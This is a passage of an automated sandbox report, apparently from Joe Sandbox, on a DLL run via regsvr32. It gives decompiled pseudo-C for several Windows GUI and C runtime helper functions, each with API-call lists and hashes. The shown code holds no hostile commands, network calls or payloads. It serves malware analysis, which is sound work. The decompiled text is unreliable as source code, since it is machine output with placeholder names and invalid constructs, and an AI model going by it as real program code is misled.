                                                                        										 *(_t107 + 4) =  *(_t107 + 4) & 0x00000000;
                                                                        										 *(_t107 + 8) = _t72[1];
                                                                        										_t103 = _a12;
                                                                        										 *_t107 = _t73;
                                                                        									}
                                                                        									_t93 =  *(_t86 + 0x48) + 0x3c;
                                                                        									__eflags = _v12;
                                                                        									_push(_t107);
                                                                        									if(__eflags == 0) {
                                                                        										E1001E118(_t93, __eflags);
                                                                        									} else {
                                                                        										_push(_v12);
                                                                        										E1001DF55(_t93);
                                                                        									}
                                                                        								}
                                                                        								goto L24;
                                                                        							}
                                                                        							_t95 =  *((intOrPtr*)(_t89 + 4));
                                                                        							_t101 =  *((intOrPtr*)(_t103 + 0xc));
                                                                        							__eflags =  *((intOrPtr*)(_t95 + 0x28)) -  *((intOrPtr*)(_t101 + _t61 * 8));
                                                                        							if( *((intOrPtr*)(_t95 + 0x28)) !=  *((intOrPtr*)(_t101 + _t61 * 8))) {
                                                                        								goto L17;
                                                                        							} else {
                                                                        								_t64 = _a4;
                                                                        								__eflags = _t64;
                                                                        								_v12 = _t64;
                                                                        								if(_t64 == 0) {
                                                                        									_a8 = _a8 & 0x00000000;
                                                                        								} else {
                                                                        									_a8 =  *(E10006D96( &_a4));
                                                                        								}
                                                                        							}
                                                                        							L24:
                                                                        							_t61 = _v8 + 1;
                                                                        							__eflags = _t61 -  *(_t103 + 8);
                                                                        							_v8 = _t61;
                                                                        						} while (_t61 <  *(_t103 + 8));
                                                                        					}
                                                                        					goto L25;
                                                                        				}
                                                                        			}




























                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,?,000000F0), ref: 100071E8
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 100071F4
                                                                        • LockResource.KERNEL32(00000000), ref: 10007209
                                                                        • FreeResource.KERNEL32(00000000), ref: 1000723C
                                                                        • GetDlgItem.USER32 ref: 100072E6
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeItemLoadLock
                                                                        • String ID:
                                                                        • API String ID: 996205394-0
                                                                        • Opcode ID: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
                                                                        • Instruction ID: 3ddb78cc740fa9bd2d00af88598f625c67c34797d15b04e165b588e19e6e1fdb
                                                                        • Opcode Fuzzy Hash: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
                                                                        • Instruction Fuzzy Hash: 37516B35A00209EFEB14CFA5C884A9EBBF5FF44390F508469E80A9B255D734EA41DF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E100344F5(void* __ecx, intOrPtr _a8) {
                                                                        				signed int _v7;
                                                                        				intOrPtr _v8;
                                                                        				struct tagRECT _v24;
                                                                        				void* _t44;
                                                                        				void* _t48;
                                                                        				void* _t52;
                                                                        				void* _t57;
                                                                        				void* _t64;
                                                                        				signed int _t67;
                                                                        				void* _t75;
                                                                        				void* _t76;
                                                                        				signed int _t78;
                                                                        
                                                                        				_t75 = __ecx;
                                                                        				_v8 = E100202AB(__ecx);
                                                                        				GetWindowRect( *(__ecx + 0x1c),  &_v24);
                                                                        				_t67 = GetSystemMetrics(0x21);
                                                                        				_t78 = GetSystemMetrics(0x20);
                                                                        				_t76 = E1002204B(_t75);
                                                                        				if((_v7 & 0x00000010) == 0) {
                                                                        					L5:
                                                                        					if(_t76 < 0xa || _t76 > 0x11) {
                                                                        						if(_t76 != 4) {
                                                                        							goto L16;
                                                                        						}
                                                                        						goto L8;
                                                                        					} else {
                                                                        						L8:
                                                                        						if((_v7 & 0x00000008) == 0) {
                                                                        							InflateRect( &_v24,  ~_t78,  ~_t67);
                                                                        							if((_v7 & 0x00000002) == 0) {
                                                                        								L16:
                                                                        								return _t76;
                                                                        							}
                                                                        							_t44 = _t76 - 4;
                                                                        							if(_t44 == 0) {
                                                                        								L21:
                                                                        								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
                                                                        							}
                                                                        							_t48 = _t44 - 9;
                                                                        							if(_t48 == 0) {
                                                                        								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
                                                                        							}
                                                                        							_t52 = _t48 - 1;
                                                                        							if(_t52 == 0) {
                                                                        								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
                                                                        							}
                                                                        							_t57 = _t52;
                                                                        							if(_t57 == 0) {
                                                                        								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
                                                                        							}
                                                                        							if(_t57 == 1) {
                                                                        								goto L21;
                                                                        							}
                                                                        							goto L16;
                                                                        						}
                                                                        						_t64 = 2;
                                                                        						return _t64;
                                                                        					}
                                                                        				}
                                                                        				if(_t76 == 3) {
                                                                        					_t76 = 2;
                                                                        				}
                                                                        				if(GetKeyState(2) >= 0) {
                                                                        					goto L5;
                                                                        				} else {
                                                                        					return 0;
                                                                        				}
                                                                        			}
















                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • GetWindowRect.USER32 ref: 1003450F
                                                                        • GetSystemMetrics.USER32 ref: 1003451D
                                                                        • GetSystemMetrics.USER32 ref: 10034523
                                                                        • GetKeyState.USER32 ref: 10034540
                                                                        • InflateRect.USER32(?,00000000,00000000), ref: 10034573
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsRectSystemWindow$InflateLongState
                                                                        • String ID:
                                                                        • API String ID: 2406722796-0
                                                                        • Opcode ID: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
                                                                        • Instruction ID: eebfe8686990ea06ae8873f0c24ea56f3203d68343432915ce32c001f6d4e862
                                                                        • Opcode Fuzzy Hash: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
                                                                        • Instruction Fuzzy Hash: 2A31D63AE0051DEFDB12DBA8C888EAE7BA5EF49291F464416D802DF193CE34F940C650
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E10022C99(void* __ebx, intOrPtr __ecx, void* __eflags) {
                                                                        				void* _t31;
                                                                        				signed int _t42;
                                                                        				struct HWND__* _t62;
                                                                        				void* _t64;
                                                                        				void* _t69;
                                                                        
                                                                        				_t69 = __eflags;
                                                                        				E10011BF0(0x1003a5dc, _t64);
                                                                        				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
                                                                        				E1001FFB4(_t64 - 0x38);
                                                                        				E10021613(_t64 - 0x88, _t69);
                                                                        				 *(_t64 - 4) = 0;
                                                                        				_t62 = GetTopWindow( *(__ecx + 0x1c));
                                                                        				if(_t62 != 0) {
                                                                        					do {
                                                                        						 *(_t64 - 0x6c) = _t62;
                                                                        						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
                                                                        						_push(_t62);
                                                                        						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x88;
                                                                        						if(E10022115() == 0 || E1001FE3C(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
                                                                        							if(E1001FE3C( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
                                                                        								_t46 =  *((intOrPtr*)(_t64 + 0xc));
                                                                        								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
                                                                        									if((SendMessageA( *(_t64 - 0x6c), 0x87, 0, 0) & 0x00000020) == 0) {
                                                                        										L11:
                                                                        										_t46 = 0;
                                                                        									} else {
                                                                        										_t42 = E100202AB(_t64 - 0x88) & 0x0000000f;
                                                                        										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
                                                                        											goto L11;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								E1001FFDA(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
                                                                        							}
                                                                        						}
                                                                        						_t62 = GetWindow(_t62, 2);
                                                                        					} while (_t62 != 0);
                                                                        				}
                                                                        				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
                                                                        				 *(_t64 - 0x6c) = 0;
                                                                        				_t31 = E10022977(_t64 - 0x88);
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
                                                                        				return _t31;
                                                                        			}









                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CtrlH_prologMessageSend
                                                                        • String ID:
                                                                        • API String ID: 4125289812-0
                                                                        • Opcode ID: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
                                                                        • Instruction ID: f32dedf2229806a380f5c1e0926675dad0c5831b186d9175a334cabdc35765a6
                                                                        • Opcode Fuzzy Hash: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
                                                                        • Instruction Fuzzy Hash: 7931D435C00258BECB25DBA4EC84AFDB7B8FF56250F90421AF456E7151DB30AE85CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E100316E6(void* __ecx, unsigned int _a4) {
                                                                        				struct HWND__* _t20;
                                                                        				void* _t23;
                                                                        				void* _t33;
                                                                        				void* _t34;
                                                                        				struct HWND__* _t35;
                                                                        
                                                                        				_t34 = __ecx;
                                                                        				if((E100202AB(__ecx) & 0x40000000) == 0) {
                                                                        					_t33 = E10022AD5(__ecx);
                                                                        				} else {
                                                                        					_t33 = __ecx;
                                                                        				}
                                                                        				if((_a4 & 0x0000000c) != 0) {
                                                                        					_t23 = E100203CE(_t33);
                                                                        					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t33 == _t34) {
                                                                        						SendMessageA( *(_t33 + 0x1c), 0x86, 0, 0);
                                                                        					} else {
                                                                        						 *(_t34 + 0x39) =  *(_t34 + 0x39) | 0x00000002;
                                                                        						SendMessageA( *(_t33 + 0x1c), 0x86, 1, 0);
                                                                        						 *(_t34 + 0x39) =  *(_t34 + 0x39) & 0x000000fd;
                                                                        					}
                                                                        				}
                                                                        				_t20 = GetWindow(GetDesktopWindow(), 5);
                                                                        				while(1) {
                                                                        					_t35 = _t20;
                                                                        					if(_t35 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(E100310CC( *(_t33 + 0x1c), _t35) != 0) {
                                                                        						SendMessageA(_t35, 0x36d, _a4, 0);
                                                                        					}
                                                                        					_t20 = GetWindow(_t35, 2);
                                                                        				}
                                                                        				return _t20;
                                                                        			}









                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • SendMessageA.USER32 ref: 1003173F
                                                                        • SendMessageA.USER32 ref: 10031753
                                                                        • GetDesktopWindow.USER32 ref: 10031757
                                                                        • SendMessageA.USER32 ref: 1003177F
                                                                        • GetWindow.USER32(00000000), ref: 10031784
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$DesktopLong
                                                                        • String ID:
                                                                        • API String ID: 2272707703-0
                                                                        • Opcode ID: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
                                                                        • Instruction ID: b2d0115702f01622c71e7e90a3c3b5da49a9f5b0f30be2a1795dd18db7154202
                                                                        • Opcode Fuzzy Hash: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
                                                                        • Instruction Fuzzy Hash: AC1106312447156BE333CA219C86FDE7ABAEF4AB91F154114F6409E1D2CF91EC418395
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10031E6F(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, struct HWND__* _a4, unsigned int _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char _v268;
                                                                        				intOrPtr _v272;
                                                                        				intOrPtr _t20;
                                                                        				int _t24;
                                                                        				unsigned int _t45;
                                                                        				intOrPtr _t52;
                                                                        
                                                                        				_t20 =  *0x1004c470; // 0x303bb91f
                                                                        				_v8 = _t20;
                                                                        				_v272 = __ecx;
                                                                        				_t52 =  *((intOrPtr*)(E100373B5() + 4));
                                                                        				if(_t52 != 0 && _a8 != 0) {
                                                                        					_t45 = _a8 >> 0x10;
                                                                        					if(_t45 != 0) {
                                                                        						_t24 =  *(_t52 + 0x8c);
                                                                        						if(_a8 == _t24 && _t45 ==  *(_t52 + 0x8e)) {
                                                                        							GlobalGetAtomNameA(_t24,  &_v268, 0x103);
                                                                        							GlobalAddAtomA( &_v268);
                                                                        							GlobalGetAtomNameA(0,  &_v268, 0x103);
                                                                        							GlobalAddAtomA( &_v268);
                                                                        							SendMessageA(_a4, 0x3e4,  *(_v272 + 0x1c), ( *(_t52 + 0x8e) & 0x0000ffff) << 0x00000010 |  *(_t52 + 0x8c) & 0x0000ffff);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E100117AE(0, _v8);
                                                                        			}











                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AtomGlobal$Name$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 1515195355-0
                                                                        • Opcode ID: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
                                                                        • Instruction ID: 486b4a3070eef5cedf278f6f896eb776bbd2baf7572d0ea587dcdbf0f4b3db2c
                                                                        • Opcode Fuzzy Hash: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
                                                                        • Instruction Fuzzy Hash: 301130759001189EDB51DB65CC90AEAB3F8FF18740F408455E599DB141DBB4AAC1CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E10033E13(intOrPtr* __ecx, int* _a4) {
                                                                        				int _v8;
                                                                        				int _t12;
                                                                        				int _t14;
                                                                        				int _t22;
                                                                        				int _t32;
                                                                        				int* _t36;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t35 = __ecx;
                                                                        				if(__ecx == 0) {
                                                                        					_t22 =  *0x1004efa8; // 0x60
                                                                        					_t12 =  *0x1004efac; // 0x60
                                                                        					goto L6;
                                                                        				} else {
                                                                        					_t32 = GetMapMode( *(__ecx + 8));
                                                                        					if(_t32 >= 7 || _t32 == 1) {
                                                                        						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                                        						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                                        						L6:
                                                                        						_t36 = _a4;
                                                                        						_v8 = _t12;
                                                                        						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
                                                                        						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
                                                                        						_t36[1] = _t14;
                                                                        					} else {
                                                                        						_push(3);
                                                                        						 *((intOrPtr*)( *__ecx + 0x34))();
                                                                        						E10028F83(__ecx, _a4);
                                                                        						_push(_t32);
                                                                        						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                                        					}
                                                                        				}
                                                                        				return _t14;
                                                                        			}










                                                                        APIs
                                                                        • GetMapMode.GDI32(?,?,?,?,?,?,1000A1B6,?,00000000,?,74778B90), ref: 10033E23
                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 10033E5D
                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10033E66
                                                                          • Part of subcall function 10028F83: MulDiv.KERNEL32(?,00000000,00000000), ref: 10028FC3
                                                                          • Part of subcall function 10028F83: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 10028FE0
                                                                        • MulDiv.KERNEL32(?,000009EC,00000060), ref: 10033E8A
                                                                        • MulDiv.KERNEL32(00000000,000009EC,74778B90), ref: 10033E95
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDevice$Mode
                                                                        • String ID:
                                                                        • API String ID: 696222070-0
                                                                        • Opcode ID: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
                                                                        • Instruction ID: 1735433994fc482824355aeef04517b355e33a0d4513a8ab2ef99d7773c3569a
                                                                        • Opcode Fuzzy Hash: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
                                                                        • Instruction Fuzzy Hash: AA11E135600614EFEB229F65CC84C0EBBEAEF89751B118429F9859B3A1C771ED018F90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E10033EA1(intOrPtr* __ecx, int* _a4) {
                                                                        				int _v8;
                                                                        				int _t12;
                                                                        				int _t14;
                                                                        				int _t30;
                                                                        				int _t33;
                                                                        				int* _t36;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t35 = __ecx;
                                                                        				if(__ecx == 0) {
                                                                        					_t30 =  *0x1004efa8; // 0x60
                                                                        					_t12 =  *0x1004efac; // 0x60
                                                                        					goto L6;
                                                                        				} else {
                                                                        					_t33 = GetMapMode( *(__ecx + 8));
                                                                        					if(_t33 >= 7 || _t33 == 1) {
                                                                        						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                                        						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                                        						L6:
                                                                        						_t36 = _a4;
                                                                        						_v8 = _t12;
                                                                        						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
                                                                        						_t10 =  &(_t36[1]); // 0x4689ec45
                                                                        						_t14 = MulDiv( *_t10, _v8, 0x9ec);
                                                                        						_t36[1] = _t14;
                                                                        					} else {
                                                                        						_push(3);
                                                                        						 *((intOrPtr*)( *__ecx + 0x34))();
                                                                        						E10028F1A(__ecx, _a4);
                                                                        						_push(_t33);
                                                                        						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                                        					}
                                                                        				}
                                                                        				return _t14;
                                                                        			}










                                                                        APIs
                                                                        • GetMapMode.GDI32(?,00000000,?,?,?,?,1000A1EA,?), ref: 10033EB1
                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 10033EEB
                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10033EF4
                                                                          • Part of subcall function 10028F1A: MulDiv.KERNEL32(1000A1EA,00000000,00000000), ref: 10028F5A
                                                                          • Part of subcall function 10028F1A: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 10028F77
                                                                        • MulDiv.KERNEL32(1000A1EA,00000060,000009EC), ref: 10033F18
                                                                        • MulDiv.KERNEL32(4689EC45,?,000009EC), ref: 10033F23
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDevice$Mode
                                                                        • String ID:
                                                                        • API String ID: 696222070-0
                                                                        • Opcode ID: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
                                                                        • Instruction ID: d9f530c2cd1e86ac66058578f4e3f5f9ceac98c77ead6ae7da37ff5c198008ea
                                                                        • Opcode Fuzzy Hash: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
                                                                        • Instruction Fuzzy Hash: 6D11C235600614EFE7229F65CC84C0EBBFAEF85752B118429F9859B361C771EC018F90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 41%
                                                                        			E1001519D(void* __edi) {
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				long _t5;
                                                                        				long _t11;
                                                                        				long _t12;
                                                                        				long* _t17;
                                                                        
                                                                        				_t5 = GetLastError();
                                                                        				_t12 = _t5;
                                                                        				_t17 =  *0x1004f5e0( *0x1004c848);
                                                                        				_t18 = _t17;
                                                                        				if(_t17 == 0) {
                                                                        					_push(0x8c);
                                                                        					_push(1);
                                                                        					_t17 = E1001382A(_t12, __edi, _t17, _t18);
                                                                        					if(_t17 == 0) {
                                                                        						L4:
                                                                        						E10011400(0x10);
                                                                        					} else {
                                                                        						_push(_t17);
                                                                        						_push( *0x1004c848);
                                                                        						if( *0x1004f5e4() == 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							_t17[0x15] = 0x1004cb00;
                                                                        							_t17[5] = 1;
                                                                        							_t11 = GetCurrentThreadId();
                                                                        							_t17[1] = _t17[1] | 0xffffffff;
                                                                        							 *_t17 = _t11;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				SetLastError(_t12);
                                                                        				return _t17;
                                                                        			}










                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
                                                                        • FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
                                                                        • SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203
                                                                          • Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
                                                                          • Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                        • FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
                                                                        • GetCurrentThreadId.KERNEL32 ref: 100151EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
                                                                        • String ID:
                                                                        • API String ID: 1487844433-0
                                                                        • Opcode ID: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
                                                                        • Instruction ID: 04c9e0168ef1b4a2d5000d056184ae8950552c627320cfc90ecd4b0af594dd98
                                                                        • Opcode Fuzzy Hash: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
                                                                        • Instruction Fuzzy Hash: F4F0C2326017269FE3225F648C49E463BE0EB017A2F104219F942CE1E1DFB5C8808794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10016B44() {
                                                                        				struct _FILETIME _v12;
                                                                        				signed int _v16;
                                                                        				union _LARGE_INTEGER _v20;
                                                                        				signed int _t7;
                                                                        				signed int _t9;
                                                                        				signed int _t10;
                                                                        				signed int _t11;
                                                                        				signed int _t15;
                                                                        				signed int _t22;
                                                                        
                                                                        				_t7 =  *0x1004c470; // 0x303bb91f
                                                                        				if(_t7 == 0 || _t7 == 0xbb40e64e) {
                                                                        					GetSystemTimeAsFileTime( &_v12);
                                                                        					_t9 = GetCurrentProcessId();
                                                                        					_t10 = GetCurrentThreadId();
                                                                        					_t11 = GetTickCount();
                                                                        					QueryPerformanceCounter( &_v20);
                                                                        					_t15 = _v16 ^ _v20.LowPart;
                                                                        					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
                                                                        					 *0x1004c470 = _t22;
                                                                        					if(_t22 == 0) {
                                                                        						 *0x1004c470 = 0xbb40e64e;
                                                                        					}
                                                                        					return _t15;
                                                                        				}
                                                                        				return _t7;
                                                                        			}













                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 10016B5F
                                                                        • GetCurrentProcessId.KERNEL32 ref: 10016B6B
                                                                        • GetCurrentThreadId.KERNEL32 ref: 10016B73
                                                                        • GetTickCount.KERNEL32 ref: 10016B7B
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 10016B87
